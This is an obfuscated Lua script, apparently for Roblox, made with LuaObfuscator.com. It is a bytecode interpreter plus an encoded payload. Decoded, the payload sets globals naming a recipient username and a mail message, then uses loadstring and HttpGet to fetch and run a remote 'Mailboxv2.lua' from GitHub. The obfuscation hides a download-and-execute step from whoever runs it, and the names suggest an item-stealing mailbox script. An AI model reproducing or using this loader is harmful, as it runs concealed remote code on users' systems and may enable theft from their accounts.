--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v92=v5(v84,v19);v19=nil;return v92;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -1)^(v32-1)))%(((1069 -(68 + 997)) -(1272 -(226 + 1044)))^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v86-(v86%(928 -(214 + 713))) ;end end else local v87=0 + 0 ;local v88;while true do if (v87==(0 + 0)) then v88=(879 -(282 + (2590 -1995)))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 -0) ;end end end end local function v21()local v34=117 -(32 + (157 -72)) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((1758 -800) -(892 + (415 -(87 + 263)))) ;v34=2 -1 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 ;return (v37 * (188 + 68)) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;v38=2 -1 ;end if (v38==(1 -0)) then return (v42 * (12211951 + 4565265)) + (v41 * (66533 -(915 + 48 + 34))) + (v40 * (724 -468)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 -0 ,1207 -((4450 -3381) + 118) ) * ((4 -2)^(69 -37))) + v43 ;local v47=v20(v44,4 + 10 + 7 ,31);local v48=((v20(v44,56 -24 )==(1 + 0)) and  -(792 -(368 + 423))) or (3 -2) ;if (v47==0) then if (v46==(0 -0)) then return v48 * (18 -(10 + 8)) ;else v47=3 -2 ;v45=442 -(341 + 75 + 26) ;end elseif (v47==(6535 -4488)) then return ((v46==((772 -(201 + 571)) + (1138 -(116 + 1022)))) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^((876 -(814 + 45)) + 35)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(2 -0)) then v57=nil;v58=nil;v52=344 -(218 + 123) ;end if ((1585 -(1535 + 46))==v52) then while true do if (v53==0) then v54=0 + 0 ;v55=nil;v53=1 + 0 ;end if (v53==(562 -(306 + 254))) then local v97=0;local v98;while true do if ((0 + 0)==v97) then v98=0;while true do if (v98==1) then v53=5 -2 ;break;end if (v98==0) then v58=nil;v59=nil;v98=1468 -(899 + 568) ;end end break;end end end if (v53~=(2 + 1)) then else v60=nil;while true do local v100=0 -0 ;while true do if (v100==0) then local v101=603 -(268 + 335) ;while true do if (v101~=1) then else v100=1;break;end if (v101==0) then local v145=290 -(60 + 230) ;while true do if (0==v145) then if (v54~=(572 -(426 + 146))) then else local v170=0 + 0 ;local v171;while true do if (v170==0) then v171=1456 -(282 + 1174) ;while true do if (v171~=(811 -(569 + 242))) then else local v186=0;while true do if (v186==0) then local v195=0 -0 ;while true do if (v195~=0) then else v55={};v56={};v195=1 + 0 ;end if ((1025 -(706 + 318))~=v195) then else v186=1252 -(721 + 530) ;break;end end end if (v186~=(1272 -(945 + 326))) then else v171=1;break;end end end if (v171==(2 -1)) then v57={};v54=1;break;end end break;end end end if (1~=v54) then else local v172=0;local v173;while true do if (v172==(0 + 0)) then v173=700 -(271 + 429) ;while true do if (v173~=(1 + 0)) then else v60={};v54=1502 -(1408 + 92) ;break;end if ((1086 -(461 + 625))~=v173) then else local v187=1288 -(993 + 295) ;while true do if (v187==0) then v58={v55,v56,nil,v57};v59=v23();v187=1;end if (v187==(1 + 0)) then v173=1 + 0 ;break;end end end end break;end end end v145=1 + 0 ;end if (v145==(1 + 0)) then v101=530 -(406 + 123) ;break;end end end end end if (v100==(1770 -(1749 + 20))) then if (v54==2) then local v116=0;while true do if (v116==0) then local v154=0 + 0 ;while true do if (v154==(1323 -(1249 + 73))) then v116=1;break;end if (v154==(0 + 0)) then local v174=1145 -(466 + 679) ;while true do if (1==v174) then v154=1;break;end if (v174==(0 -0)) then for v179=2 -1 ,v59 do local v180=0;local v181;local v182;local v183;while true do if (v180==(1900 -(106 + 1794))) then v181=0;v182=nil;v180=1;end if (1==v180) then v183=nil;while true do if (1==v181) then if (v182==(1 + 0)) then v183=v21()~=(0 + 0) ;elseif (v182==(5 -3)) then v183=v24();elseif (v182~=(7 -4)) then else v183=v25();end v60[v179]=v183;break;end if (v181==0) then local v197=114 -(4 + 110) ;local v198;while true do if (v197==(584 -(57 + 527))) then v198=1427 -(41 + 1386) ;while true do if (v198~=(103 -(17 + 86))) then else v182=v21();v183=nil;v198=1 + 0 ;end if (v198==1) then v181=1 -0 ;break;end end break;end end end end break;end end end v58[3]=v21();v174=2 -1 ;end end end end end if (v116==1) then for v163=167 -(122 + 44) ,v23() do local v164=0 -0 ;local v165;local v166;while true do if (v164==0) then local v176=0;local v177;while true do if (v176==0) then v177=0;while true do if (v177~=(3 -2)) then else v164=1;break;end if (0~=v177) then else local v194=0 + 0 ;while true do if ((1 + 0)==v194) then v177=1;break;end if ((0 -0)==v194) then v165=0;v166=nil;v194=66 -(30 + 35) ;end end end end break;end end end if (v164~=1) then else while true do if (v165==(0 + 0)) then v166=v21();if (v20(v166,1258 -(1043 + 214) ,3 -2 )~=0) then else local v188=0;local v189;local v190;local v191;local v192;local v193;while true do if ((1213 -(323 + 889))~=v188) then else v191=nil;v192=nil;v188=5 -3 ;end if (v188~=(582 -(361 + 219))) then else v193=nil;while true do if (v189==(320 -(53 + 267))) then v190=0;v191=nil;v189=1;end if (v189==(1 + 0)) then local v199=413 -(15 + 398) ;while true do if (v199==(983 -(18 + 964))) then v189=2;break;end if (v199==0) then v192=nil;v193=nil;v199=3 -2 ;end end end if (v189~=(2 + 0)) then else while true do if (v190~=1) then else local v200=0 + 0 ;while true do if (v200==(850 -(20 + 830))) then v193={v22(),v22(),nil,nil};if (v191==0) then local v206=0;local v207;while true do if (v206~=0) then else v207=0;while true do if (0==v207) then v193[3]=v22();v193[742 -(542 + 196) ]=v22();break;end end break;end end elseif (v191==(1 -0)) then v193[3]=v23();elseif (v191==(1 + 1)) then v193[3]=v23() -(2^(9 + 7)) ;elseif (v191~=3) then else local v216=0 + 0 ;local v217;while true do if (v216~=0) then else v217=0 -0 ;while true do if (v217==(0 -0)) then v193[3]=v23() -(2^16) ;v193[4]=v22();break;end end break;end end end v200=1;end if (v200==1) then v190=1553 -(1126 + 425) ;break;end end end if (v190==(408 -(118 + 287))) then if (v20(v192,11 -8 ,3)==1) then v193[1125 -(118 + 1003) ]=v60[v193[11 -7 ]];end v55[v163]=v193;break;end if (v190==(379 -(142 + 235))) then local v202=0 -0 ;while true do if (v202~=(1 + 0)) then else v190=980 -(553 + 424) ;break;end if (v202~=(0 -0)) then else if (v20(v192,1,1)==(1 + 0)) then v193[2]=v60[v193[2 + 0 ]];end if (v20(v192,2,2)~=1) then else v193[3]=v60[v193[3]];end v202=1 + 0 ;end end end if (0==v190) then local v203=0 + 0 ;while true do if (0==v203) then v191=v20(v166,2 + 0 ,6 -3 );v192=v20(v166,4,6);v203=2 -1 ;end if (1==v203) then v190=1;break;end end end end break;end end break;end if (v188==0) then v189=0;v190=nil;v188=2 -1 ;end end end break;end end break;end end end v54=1 + 2 ;break;end end end if ((14 -11)~=v54) then else local v117=0;local v118;while true do if (v117==0) then v118=0;while true do if (v118==(753 -(239 + 514))) then local v175=0;while true do if (v175~=(0 + 0)) then else for v184=1330 -(797 + 532) ,v23() do v56[v184-1 ]=v28();end return v58;end end end end break;end end end break;end end end break;end if (v53==(1 + 0)) then local v99=0 + 0 ;while true do if (v99==(2 -1)) then v53=2;break;end if (0==v99) then v56=nil;v57=nil;v99=1203 -(373 + 829) ;end end end end break;end if (v52==(734 -(476 + 255))) then v59=nil;v60=nil;v52=1134 -(369 + 761) ;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v81[3];else v73=v81[3];end elseif (v82<=2) then do return;end elseif (v82==3) then v79[v81[2]]();else for v146=v81[2],v81[3] do v79[v146]=nil;end end elseif (v82<=7) then if (v82<=5) then local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==1) then v74=(v108 + v106) -1 ;v109=0;v105=2;end if (0==v105) then v106=v81[2];v107,v108=v72(v79[v106](v13(v79,v106 + 1 ,v81[3])));v105=1;end if (v105==2) then for v149=v106,v74 do v109=v109 + 1 ;v79[v149]=v107[v109];end break;end end elseif (v82==6) then v63[v81[3]]=v79[v81[2]];else local v121=0;local v122;local v123;while true do if (v121==0) then v122=v81[2];v123=v79[v81[3]];v121=1;end if (1==v121) then v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];break;end end end elseif (v82<=8) then v79[v81[2]]();elseif (v82>9) then do return;end else local v124=0;local v125;while true do if (v124==0) then v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));break;end end end elseif (v82<=15) then if (v82<=12) then if (v82==11) then local v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=13) then for v114=v81[2],v81[3] do v79[v114]=nil;end elseif (v82==14) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==0) then v130=v81[2];v131,v132=v72(v79[v130](v13(v79,v130 + 1 ,v81[3])));v129=1;end if (v129==1) then v74=(v132 + v130) -1 ;v133=0;v129=2;end if (v129==2) then for v167=v130,v74 do v133=v133 + 1 ;v79[v167]=v131[v133];end break;end end else local v134=v81[2];local v135=v79[v81[3]];v79[v134 + 1 ]=v135;v79[v134]=v135[v81[4]];end elseif (v82<=18) then if (v82<=16) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82>17) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=19) then v79[v81[2]]=v81[3];elseif (v82>20) then v63[v81[3]]=v79[v81[2]];else v73=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503023O006869030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B646D3036332F4475636B783036332F6D61696E2F4D61696C626F7876322E6C756103083O00557365726E616D6503083O00682O627631323334030F3O00475F4C6F6164696E675363722O656E03073O005245447A485542001C3O0012133O00014O000D000100013O0026123O0002000100010004013O00020001001213000100013O00261200010011000100020004013O00110001001213000200043O001215000200033O001210000200053O001210000300063O002007000300030007001213000500084O0005000300054O000B00023O00022O00030002000100010004013O001B000100261200010005000100010004013O000500010012130002000A3O001215000200093O0012130002000C3O0012150002000B3O001213000100023O0004013O000500010004013O001B00010004013O000200012O00023O00017O00",v9(),...);
